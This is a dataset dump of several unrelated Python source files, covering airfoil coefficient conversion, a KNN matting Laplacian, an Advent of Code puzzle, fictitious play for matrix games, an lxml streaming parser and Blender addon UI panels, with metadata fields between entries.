ax_cl.set_xlabel('alpha, deg')
ax_cd.set_xlabel('alpha, deg')
ax_cl.set_ylabel('Lift Coefficient')
ax_cd.set_ylabel('Drag Coefficient')
ax_cl.legend()
ax_cd.legend()
plt.show()
| import sys
import numpy as np
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('--plot', action='store_true')
parser.add_argument('xtfile')
parser.add_argument('ytfile')
parser.add_argument('outfilepattern')
args = parser.parse_args()
if args.plot:
import matplotlib.pyplot as plt
with open(args.xtfile, mode='r') as f:
comment, num_alpha, num_Re = f.readline().split()
num_alpha = int(num_alpha)
num_Re = int(num_Re)
xt = np.loadtxt(f, delimiter=' ')
xt.shape = (num_alpha, num_Re, -1)
yt = np.loadtxt(args.ytfile, delimiter=' ')
yt.shape = (num_alpha, num_Re, -1)
if args.plot:
fig, (ax_cl, ax_cd) = plt.subplots(nrows=2, sharex=True)
for i in range(num_Re):
# Check that the Reynolds numbers for this index are all the same.
if np.std(xt[:, i, 1]) > 1e-10:
print(f"warning: Reynolds numbers for index i = {i} appear to differ", file=sys.stderr)
alpha = np.degrees(xt[:, i, 0])
Re = xt[0, i, 1]
cl = yt[:, i, 0]
cd = yt[:, i, 1]
cl_over_cd = cl/cd
max_cl_over_cd = np.max(cl_over_cd)
max_cl_over_cd_alpha = alpha[np.argmax(cl_over_cd)]
fname = args.outfilepattern.format(i)
header = f"Re = {Re}e6, max(Cl/Cd) = {max_cl_over_cd} at alpha = {max_cl_over_cd_alpha} deg"
print(f"fname = {fname}, {header}")
data = np.concatenate(
[
alpha[:, np.newaxis], cl[:, np.newaxis], cd[:, np.newaxis]
],
axis=1)
np.savetxt(fname, data, delimiter=' ', header=header)
if args.plot:
ax_cl.plot(alpha, cl, label=f'Re = {Re}e6')
ax_cd.plot(alpha, cd, label=f'Re = {Re}e6')
if args.plot:
ax_cl.set_xlabel('alpha, deg')
ax_cd.set_xlabel('alpha, deg')
ax_cl.set_ylabel('Lift Coefficient')
ax_cd.set_ylabel('Drag Coefficient')
ax_cl.legend()
ax_cd.legend()
plt.show()
| en | 0.861475 | # Check that the Reynolds numbers for this index are all the same. | 2.581266 | 3 |
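A hedged sketch of input files that would satisfy the parser above: xt needs a "<comment> num_alpha num_Re" header line followed by (alpha in radians, Re) rows ordered alpha-major, and yt holds the matching (cl, cd) rows with no header. The file names, toy numbers, and output pattern are assumptions, not part of the original repository.

import numpy as np

num_alpha, num_Re = 3, 2
alphas = np.radians([-5.0, 0.0, 5.0])
xt = np.array([[a, re] for a in alphas for re in (0.5, 1.0)])   # shape (num_alpha*num_Re, 2)
yt = np.column_stack([0.1 * np.degrees(xt[:, 0]) + 0.6,         # toy lift coefficients
                      np.full(len(xt), 0.02)])                  # constant toy drag
np.savetxt("xt.txt", xt, delimiter=" ", header=f"toy {num_alpha} {num_Re}", comments="")
np.savetxt("yt.txt", yt, delimiter=" ")
# then, for example:  python openbemt_to_ccblade.py xt.txt yt.txt "af_Re{}.dat"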
pymatting/laplacian/knn_laplacian.py | chendeheng611/pymatting | 0 | 6632524 | <filename>pymatting/laplacian/knn_laplacian.py
import numpy as np
import scipy.sparse
from pymatting.util.kdtree import knn
from pymatting.util.util import normalize_rows
def knn_laplacian(
image, n_neighbors=[20, 10], distance_weights=[2.0, 0.1],
):
"""
This function calculates the KNN matting Laplacian matrix as described in :cite:`chen2013knn`.
Parameters
----------
image: numpy.ndarray
Image with shape :math:`h\\times w \\times 3`
n_neighbors: list of ints
Number of neighbors to consider. If :code:`len(n_neighbors)>1` multiple nearest neighbor calculations are done and merged, defaults to `[20, 10]`, i.e. first 20 neighbors are considered and in the second run :math:`10` neighbors. The pixel distances are then weighted by the :code:`distance_weights`.
distance_weights: list of floats
        Weight of distance in feature vector, defaults to `[2.0, 0.1]`.
Returns
---------
L: scipy.sparse.spmatrix
Matting Laplacian matrix
"""
h, w = image.shape[:2]
r, g, b = image.reshape(-1, 3).T
n = w * h
x = np.tile(np.linspace(0, 1, w), h)
y = np.repeat(np.linspace(0, 1, h), w)
i, j = [], []
for k, distance_weight in zip(n_neighbors, distance_weights):
f = np.stack(
[r, g, b, distance_weight * x, distance_weight * y],
axis=1,
out=np.zeros((n, 5), dtype=np.float32),
)
distances, neighbors = knn(f, f, k=k)
i.append(np.repeat(np.arange(n), k))
j.append(neighbors.flatten())
ij = np.concatenate(i + j)
ji = np.concatenate(j + i)
coo_data = np.ones(2 * sum(n_neighbors) * n)
W = scipy.sparse.csr_matrix((coo_data, (ij, ji)), (n, n))
W = normalize_rows(W)
I = scipy.sparse.identity(n)
L = I - W
return L
| <filename>pymatting/laplacian/knn_laplacian.py
import numpy as np
import scipy.sparse
from pymatting.util.kdtree import knn
from pymatting.util.util import normalize_rows
def knn_laplacian(
image, n_neighbors=[20, 10], distance_weights=[2.0, 0.1],
):
"""
This function calculates the KNN matting Laplacian matrix as described in :cite:`chen2013knn`.
Parameters
----------
image: numpy.ndarray
Image with shape :math:`h\\times w \\times 3`
n_neighbors: list of ints
Number of neighbors to consider. If :code:`len(n_neighbors)>1` multiple nearest neighbor calculations are done and merged, defaults to `[20, 10]`, i.e. first 20 neighbors are considered and in the second run :math:`10` neighbors. The pixel distances are then weighted by the :code:`distance_weights`.
distance_weights: list of floats
        Weight of distance in feature vector, defaults to `[2.0, 0.1]`.
Returns
---------
L: scipy.sparse.spmatrix
Matting Laplacian matrix
"""
h, w = image.shape[:2]
r, g, b = image.reshape(-1, 3).T
n = w * h
x = np.tile(np.linspace(0, 1, w), h)
y = np.repeat(np.linspace(0, 1, h), w)
i, j = [], []
for k, distance_weight in zip(n_neighbors, distance_weights):
f = np.stack(
[r, g, b, distance_weight * x, distance_weight * y],
axis=1,
out=np.zeros((n, 5), dtype=np.float32),
)
distances, neighbors = knn(f, f, k=k)
i.append(np.repeat(np.arange(n), k))
j.append(neighbors.flatten())
ij = np.concatenate(i + j)
ji = np.concatenate(j + i)
coo_data = np.ones(2 * sum(n_neighbors) * n)
W = scipy.sparse.csr_matrix((coo_data, (ij, ji)), (n, n))
W = normalize_rows(W)
I = scipy.sparse.identity(n)
L = I - W
return L
| en | 0.801189 | This function calculates the KNN matting Laplacian matrix as described in :cite:`chen2013knn`. Parameters ---------- image: numpy.ndarray Image with shape :math:`h\\times w \\times 3` n_neighbors: list of ints Number of neighbors to consider. If :code:`len(n_neighbors)>1` multiple nearest neighbor calculations are done and merged, defaults to `[20, 10]`, i.e. first 20 neighbors are considered and in the second run :math:`10` neighbors. The pixel distances are then weighted by the :code:`distance_weights`. distance_weights: list of floats Weight of distance in feature vector, defaults to `[2.0, 1.0]`. Returns --------- L: scipy.sparse.spmatrix Matting Laplacian matrix | 3.535841 | 4 |
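A brief usage sketch for the function above, assuming the pymatting package is installed; the input image is just random noise. Because W is row-normalized, every row of L = I - W should sum to (numerically) zero, which makes a handy sanity check.

import numpy as np
from pymatting.laplacian.knn_laplacian import knn_laplacian   # import path taken from the row above

image = np.random.rand(8, 8, 3)
L = knn_laplacian(image)                   # sparse (h*w, h*w) matting Laplacian
print(L.shape)                             # (64, 64)
print(abs(L.sum(axis=1)).max() < 1e-8)     # True: rows of I - W sum to ~0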
13/13a.py | dfwarden/Advent-of-Code-2020-Exercises | 0 | 6632525 | <reponame>dfwarden/Advent-of-Code-2020-Exercises
import copy
def run():
'''
File input is a plain text file of lines.
First line is estimate of earliest timestamp I could board bus departing seaport.
Second line are bus IDs in service that indicate how often the bus departs the seaport.
'''
with open('input') as f:
lines = f.readlines()
earliest_departure = int(lines[0])
busses = [int(bus) for bus in lines[1].rstrip().split(',') if bus != 'x']
wait_times = [] # index matches busses
for bus in busses:
wait_counter = earliest_departure
while True:
if wait_counter % bus == 0:
wait_times.append(wait_counter)
break
wait_counter += 1
    # `wait_times` now holds, for each bus, the first departure timestamp at or
    # after `earliest_departure`; the bus with the shortest wait therefore has
    # the same index as the smallest value in wait_times
best_departure = min(wait_times)
best_bus = busses[wait_times.index(best_departure)]
print(f'Best bus multiplied by wait time: {best_bus * (best_departure - earliest_departure)}')
if __name__ == '__main__':
run()
| import copy
def run():
'''
File input is a plain text file of lines.
First line is estimate of earliest timestamp I could board bus departing seaport.
Second line are bus IDs in service that indicate how often the bus departs the seaport.
'''
with open('input') as f:
lines = f.readlines()
earliest_departure = int(lines[0])
busses = [int(bus) for bus in lines[1].rstrip().split(',') if bus != 'x']
wait_times = [] # index matches busses
for bus in busses:
wait_counter = earliest_departure
while True:
if wait_counter % bus == 0:
wait_times.append(wait_counter)
break
wait_counter += 1
    # `wait_times` now holds, for each bus, the first departure timestamp at or
    # after `earliest_departure`; the bus with the shortest wait therefore has
    # the same index as the smallest value in wait_times
best_departure = min(wait_times)
best_bus = busses[wait_times.index(best_departure)]
print(f'Best bus multiplied by wait time: {best_bus * (best_departure - earliest_departure)}')
if __name__ == '__main__':
run() | en | 0.93887 | File input is a plain text file of lines. First line is estimate of earliest timestamp I could board bus departing seaport. Second line are bus IDs in service that indicate how often the bus departs the seaport. # index matches busses # `wait_times` should now have the minutes necessary to wait for each bus # The bus with the shortest wait has the same index as the smallest value # in wait_times | 3.784919 | 4 |
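A quick check of the same logic against the publicly known sample for this puzzle (earliest timestamp 939, busses 7, 13, 59, 31, 19), for which the expected product is 295. The ceiling expression below replaces the script's increment loop but yields the same first departure per bus.

earliest = 939
busses = [7, 13, 59, 31, 19]
departures = [-(-earliest // bus) * bus for bus in busses]   # first departure at or after `earliest`
best = min(departures)
best_bus = busses[departures.index(best)]
print(best_bus * (best - earliest))   # 295: bus 59 leaves at 944, a 5 minute wait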
fictitious_play.py | Arnukk/FP_RFP_LH | 1 | 6632526 | import numpy
import math
from scipy import stats
def RandomizedFictitiousPlay(A, Epsilon):
n = len(A[0])
m = len(A)
X = numpy.matrix(numpy.zeros((m, 1), dtype=int))
Y = numpy.matrix(numpy.zeros((n, 1), dtype=int))
X[0] = 1
Y[0] = 1
numpy.random.shuffle(X)
numpy.random.shuffle(Y)
t = int(round(6*math.log(2*n*m)/pow(Epsilon, 2)))
for i in range(t):
Ax = numpy.array(numpy.transpose(A) * X).tolist()
#print Ax
Ay = numpy.array(A * Y).tolist()
#print Ay
values = Ay
probabilities = []
for item in Ay:
probabilities.append(pow(math.e, Epsilon*item[0]/2))
while True:
try:
theprobabilities = []
temp = sum(probabilities)
theprobabilities[:] = [x / temp for x in probabilities]
distrib = stats.rv_discrete(values=(values, theprobabilities))
xchoice = Ay.index(distrib.rvs(size=1)[0])
break
except:
pass
values = Ax
probabilities = []
for item in Ax:
probabilities.append(pow(math.e, -Epsilon*item[0]/2))
while True:
try:
theprobabilities = []
temp = sum(probabilities)
theprobabilities[:] = [x / temp for x in probabilities]
distrib = stats.rv_discrete(values=(values, theprobabilities))
ychoice = Ax.index(distrib.rvs(size=1)[0])
break
except:
pass
#print xchoice
X[xchoice] += 1
#print X
#print ychoice
Y[ychoice] += 1
#print Y
return X/float(t+1), Y/float(t+1)
def FictitiousPlay(A, t):
n = len(A[0])
m = len(A)
X = numpy.matrix(numpy.zeros((m, 1), dtype=int))
Y = numpy.matrix(numpy.zeros((n, 1), dtype=int))
X[0] = 1
Y[0] = 1
numpy.random.shuffle(X)
numpy.random.shuffle(Y)
for i in range(t):
Ax = numpy.array(numpy.transpose(A) * X).tolist()
Ay = numpy.array(A * Y).tolist()
xchoice = Ax.index(min(Ax))
ychoice = Ay.index(max(Ay))
#print xchoice
X[ychoice] += 1
#print X
#print ychoice
Y[xchoice] += 1
#print Y
return X/float(t+1), Y/float(t+1)
#The payoff Matrix
A = numpy.identity(5, dtype=int)
#A = numpy.array([[1, 0, 2, -2], [-1, 1, -1, 0]])
print FictitiousPlay(A, 10000)
print RandomizedFictitiousPlay(A, 0.1)
#r = 1
#while r >= 0.3:
# temp1, temp = RandomizedFictitiousPlay(A, 0.1)
# Ax = numpy.array(numpy.transpose(A) * temp1).tolist()
# Ay = numpy.array(A * temp).tolist()
# r = abs(max(Ay)[0] - min(Ax)[0])
# print r
#print temp1, temp
#while temp
#print RandomizedFictitiousPlay(A, 0.1)
#print FictitiousPlay(A, 1700) | import numpy
import math
from scipy import stats
def RandomizedFictitiousPlay(A, Epsilon):
n = len(A[0])
m = len(A)
X = numpy.matrix(numpy.zeros((m, 1), dtype=int))
Y = numpy.matrix(numpy.zeros((n, 1), dtype=int))
X[0] = 1
Y[0] = 1
numpy.random.shuffle(X)
numpy.random.shuffle(Y)
t = int(round(6*math.log(2*n*m)/pow(Epsilon, 2)))
for i in range(t):
Ax = numpy.array(numpy.transpose(A) * X).tolist()
#print Ax
Ay = numpy.array(A * Y).tolist()
#print Ay
values = Ay
probabilities = []
for item in Ay:
probabilities.append(pow(math.e, Epsilon*item[0]/2))
while True:
try:
theprobabilities = []
temp = sum(probabilities)
theprobabilities[:] = [x / temp for x in probabilities]
distrib = stats.rv_discrete(values=(values, theprobabilities))
xchoice = Ay.index(distrib.rvs(size=1)[0])
break
except:
pass
values = Ax
probabilities = []
for item in Ax:
probabilities.append(pow(math.e, -Epsilon*item[0]/2))
while True:
try:
theprobabilities = []
temp = sum(probabilities)
theprobabilities[:] = [x / temp for x in probabilities]
distrib = stats.rv_discrete(values=(values, theprobabilities))
ychoice = Ax.index(distrib.rvs(size=1)[0])
break
except:
pass
#print xchoice
X[xchoice] += 1
#print X
#print ychoice
Y[ychoice] += 1
#print Y
return X/float(t+1), Y/float(t+1)
def FictitiousPlay(A, t):
n = len(A[0])
m = len(A)
X = numpy.matrix(numpy.zeros((m, 1), dtype=int))
Y = numpy.matrix(numpy.zeros((n, 1), dtype=int))
X[0] = 1
Y[0] = 1
numpy.random.shuffle(X)
numpy.random.shuffle(Y)
for i in range(t):
Ax = numpy.array(numpy.transpose(A) * X).tolist()
Ay = numpy.array(A * Y).tolist()
xchoice = Ax.index(min(Ax))
ychoice = Ay.index(max(Ay))
#print xchoice
X[ychoice] += 1
#print X
#print ychoice
Y[xchoice] += 1
#print Y
return X/float(t+1), Y/float(t+1)
#The payoff Matrix
A = numpy.identity(5, dtype=int)
#A = numpy.array([[1, 0, 2, -2], [-1, 1, -1, 0]])
print FictitiousPlay(A, 10000)
print RandomizedFictitiousPlay(A, 0.1)
#r = 1
#while r >= 0.3:
# temp1, temp = RandomizedFictitiousPlay(A, 0.1)
# Ax = numpy.array(numpy.transpose(A) * temp1).tolist()
# Ay = numpy.array(A * temp).tolist()
# r = abs(max(Ay)[0] - min(Ax)[0])
# print r
#print temp1, temp
#while temp
#print RandomizedFictitiousPlay(A, 0.1)
#print FictitiousPlay(A, 1700) | en | 0.275124 | #print Ax #print Ay #print xchoice #print X #print ychoice #print Y #print xchoice #print X #print ychoice #print Y #The payoff Matrix #A = numpy.array([[1, 0, 2, -2], [-1, 1, -1, 0]]) #r = 1 #while r >= 0.3: # temp1, temp = RandomizedFictitiousPlay(A, 0.1) # Ax = numpy.array(numpy.transpose(A) * temp1).tolist() # Ay = numpy.array(A * temp).tolist() # r = abs(max(Ay)[0] - min(Ax)[0]) # print r #print temp1, temp #while temp #print RandomizedFictitiousPlay(A, 0.1) #print FictitiousPlay(A, 1700) | 3.2824 | 3 |
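The script above is written for Python 2 (bare print statements). Its commented-out tail also hints at the natural convergence check: the duality gap max(A y) - min(A^T x) of the returned empirical strategies should shrink toward zero. A small Python 3 sketch of that check, using the uniform strategy that is optimal for the 5x5 identity game:

import numpy as np

def duality_gap(A, x, y):
    # distance of the mixed strategies x (row player) and y (column player) from equilibrium
    return float(np.max(A @ y) - np.min(A.T @ x))

A = np.identity(5)
x = y = np.full((5, 1), 0.2)     # uniform play; the value of the identity game is 1/5
print(duality_gap(A, x, y))      # 0.0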
fileutils/xml.py | nicholasding/fileutils | 0 | 6632527 | <reponame>nicholasding/fileutils
from lxml import etree
def fast_iter(context, func):
for event, el in context:
func(el)
el.clear()
while el.getprevious() is not None:
del el.getparent()[0]
del context
def iterparse(fp, tag, func):
context = etree.iterparse(fp, events=('end',), tag=tag)
fast_iter(context, func)
| from lxml import etree
def fast_iter(context, func):
for event, el in context:
func(el)
el.clear()
while el.getprevious() is not None:
del el.getparent()[0]
del context
def iterparse(fp, tag, func):
context = etree.iterparse(fp, events=('end',), tag=tag)
fast_iter(context, func) | none | 1 | 2.742525 | 3 |
|
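A minimal usage sketch for the helpers above; the in-memory document and the import path fileutils.xml are assumptions, and lxml must be installed. Each <item> element is passed to the callback and then cleared and detached, which is what keeps memory flat when streaming very large XML files.

from io import BytesIO
from fileutils.xml import iterparse   # assumed package layout matching the repo path above

doc = BytesIO(b"<root><item>a</item><item>b</item></root>")
iterparse(doc, tag="item", func=lambda el: print(el.text))   # prints: a, then b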
sollumz_ui.py | Loyalists/Sollumz | 4 | 6632528 | <filename>sollumz_ui.py
import bpy
from .sollumz_helper import *
from .sollumz_properties import *
class OrderListHelper:
orderkey = "name"
def filter_items(self, context, data, propname):
helper = bpy.types.UI_UL_list
items = getattr(data, propname)
ordered = helper.sort_items_by_name(items, self.orderkey)
filtered = helper.filter_items_by_name(
self.filter_name, self.bitflag_filter_item, items, propname=self.orderkey, flags=None, reverse=False)
return filtered, ordered
class SOLLUMZ_PT_import_main(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
bl_order = 0
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "batch_mode")
class SOLLUMZ_PT_import_geometry(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Geometry"
bl_parent_id = "FILE_PT_operator"
bl_order = 1
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "join_geometries")
class SOLLUMZ_PT_import_fragment(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Fragment"
bl_parent_id = "FILE_PT_operator"
bl_order = 2
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "split_by_bone")
class SOLLUMZ_PT_import_skeleton(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Skeleton"
bl_parent_id = "FILE_PT_operator"
bl_order = 3
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "import_ext_skeleton")
class SOLLUMZ_PT_export_main(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
bl_order = 0
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
row = layout.row(align=True)
row.prop(operator.export_settings, "batch_mode")
sub = row.row(align=True)
sub.prop(operator.export_settings, "use_batch_own_dir",
text="", icon='NEWFOLDER')
class SOLLUMZ_PT_export_include(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Include"
bl_parent_id = "FILE_PT_operator"
bl_order = 1
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
sublayout = layout.column(heading="Limit to")
sublayout.enabled = (operator.export_settings.batch_mode == "OFF")
sublayout.prop(operator.export_settings, "use_selection")
sublayout.prop(operator.export_settings, "use_active_collection")
col = layout.column()
col.prop(operator.export_settings, "sollum_types")
class SOLLUMZ_PT_export_exclude(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Exclude"
bl_parent_id = "FILE_PT_operator"
bl_order = 2
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "exclude_skeleton")
class SOLLUMZ_PT_export_geometry(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Geometry"
bl_parent_id = "FILE_PT_operator"
bl_order = 3
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "use_transforms")
class SOLLUMZ_PT_export_fragment(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Fragment"
bl_parent_id = "FILE_PT_operator"
bl_order = 4
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "export_with_hi")
class SOLLUMZ_PT_TOOL_PANEL(bpy.types.Panel):
bl_label = "General Tools"
bl_idname = "SOLLUMZ_PT_TOOL_PANEL"
bl_category = "Sollumz Tools"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_order = 0
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="MODIFIER_DATA")
def draw(self, context):
layout = self.layout
layout.label(text="View")
layout.prop(context.scene, "hide_collision")
layout.prop(context.scene, "hide_high_lods")
layout.prop(context.scene, "hide_medium_lods")
layout.prop(context.scene, "hide_low_lods")
layout.prop(context.scene, "hide_very_low_lods")
layout.prop(context.space_data.overlay,
"show_bones", text="Show Skeleton")
class SOLLUMZ_PT_DEBUG_PANEL(bpy.types.Panel):
bl_label = "Debug"
bl_idname = "SOLLUMZ_PT_DEBUG_PANEL"
bl_category = "Sollumz Tools"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="PREFERENCES")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.debug_hierarchy")
row.prop(context.scene, "debug_sollum_type")
class SOLLUMZ_PT_VERTEX_TOOL_PANEL(bpy.types.Panel):
bl_label = "Vertex Painter"
bl_idname = "SOLLUMZ_PT_VERTEX_TOOL_PANELL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="BRUSH_DATA")
def draw(self, context):
layout = self.layout
row = layout.row()
row.prop(context.scene, "vert_paint_color")
row.operator("sollumz.paint_vertices")
class SOLLUMZ_PT_TERRAIN_PAINTER_PANEL(bpy.types.Panel):
bl_label = "Terrain Painter"
bl_idname = "SOLLUMZ_PT_TERRAIN_PAINTER_PANEL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_VERTEX_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="IMAGE")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.paint_tex1")
row.operator("sollumz.paint_tex2")
row = layout.row()
row.operator("sollumz.paint_tex3")
row.operator("sollumz.paint_tex4")
row = layout.row()
row.operator("sollumz.paint_a")
row.prop(context.scene, "vert_paint_alpha")
class SOLLUMZ_PT_YMAP_TOOL_PANEL(bpy.types.Panel):
bl_label = "Ymap Tools"
bl_idname = "SOLLUMZ_PT_YMAP_TOOL_PANEL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="FILE")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.importymap")
row.operator("sollumz.exportymap")
class SOLLUMZ_PT_OBJECT_PANEL(bpy.types.Panel):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_PT_MAIN_PANEL"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'object'
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
layout.use_property_split = True
obj = context.active_object
row = layout.row()
row.enabled = False
row.prop(obj, "sollum_type")
if not obj or obj.sollum_type == SollumType.NONE:
layout.label(
text="No sollumz objects in scene selected.", icon="ERROR")
class SOLLUMZ_PT_ENTITY_PANEL(bpy.types.Panel):
bl_label = "Entity Definition"
bl_idname = 'SOLLUMZ_PT_ENTITY_PANEL'
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "object"
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_OBJECT_PANEL.bl_idname
@ classmethod
def poll(cls, context):
aobj = context.active_object
return aobj != None and aobj.sollum_type == SollumType.DRAWABLE
def draw(self, context):
layout = self.layout
grid = layout.grid_flow(columns=2, even_columns=True, even_rows=True)
grid.use_property_split = True
aobj = context.active_object
grid.prop(aobj.entity_properties, "flags")
grid.prop(aobj.entity_properties, "guid")
grid.prop(aobj.entity_properties, "parent_index")
grid.prop(aobj.entity_properties, "lod_dist")
grid.prop(aobj.entity_properties, "child_lod_dist")
grid.prop(aobj.entity_properties, "num_children")
grid.prop(aobj.entity_properties, "ambient_occlusion_multiplier")
grid.prop(aobj.entity_properties, "artificial_ambient_occlusion")
grid.prop(aobj.entity_properties, "tint_value")
grid.prop(aobj.entity_properties, "lod_level")
grid.prop(aobj.entity_properties, "priority_level")
class SOLLUMZ_PT_MAT_PANEL(bpy.types.Panel):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_PT_MAT_PANEL"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'material'
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
aobj = context.active_object
if context.active_object == None:
return
mat = aobj.active_material
if not mat or mat.sollum_type == MaterialType.NONE:
layout.label(text="No sollumz material active.", icon="ERROR")
class FlagsPanel:
bl_label = "Flags"
bl_options = {'DEFAULT_CLOSED'}
def get_flags(self, context):
raise NotImplementedError(
f"Failed to display flags. '{self.__class__.__name__}.get_flags()' method not defined.")
def draw(self, context):
data_block = self.get_flags(context)
self.layout.prop(data_block, "total")
self.layout.separator()
grid = self.layout.grid_flow(columns=2)
for index, prop_name in enumerate(data_block.__annotations__):
if index > data_block.size - 1:
break
grid.prop(data_block, prop_name)
class TimeFlagsPanel(FlagsPanel):
bl_label = "Time Flags"
select_operator = None
clear_operator = None
def draw(self, context):
super().draw(context)
if self.select_operator is None or self.clear_operator is None:
raise NotImplementedError(
f"'select_operator' and 'clear_operator' bl_idnames must be defined for {self.__class__.__name__}!")
flags = self.get_flags(context)
row = self.layout.row()
row.operator(self.select_operator)
row.prop(flags, "time_flags_start", text="from")
row.prop(flags, "time_flags_end", text="to")
row = self.layout.row()
row.operator(self.clear_operator)
class SOLLUMZ_MT_sollumz(bpy.types.Menu):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_MT_sollumz"
def draw(self, context):
layout = self.layout
def DrawSollumzMenu(self, context):
self.layout.separator()
self.layout.menu(SOLLUMZ_MT_sollumz.bl_idname, icon="BLENDER")
def register():
bpy.types.VIEW3D_MT_add.append(DrawSollumzMenu)
def unregister():
bpy.types.VIEW3D_MT_add.remove(DrawSollumzMenu)
| <filename>sollumz_ui.py
import bpy
from .sollumz_helper import *
from .sollumz_properties import *
class OrderListHelper:
orderkey = "name"
def filter_items(self, context, data, propname):
helper = bpy.types.UI_UL_list
items = getattr(data, propname)
ordered = helper.sort_items_by_name(items, self.orderkey)
filtered = helper.filter_items_by_name(
self.filter_name, self.bitflag_filter_item, items, propname=self.orderkey, flags=None, reverse=False)
return filtered, ordered
class SOLLUMZ_PT_import_main(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
bl_order = 0
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
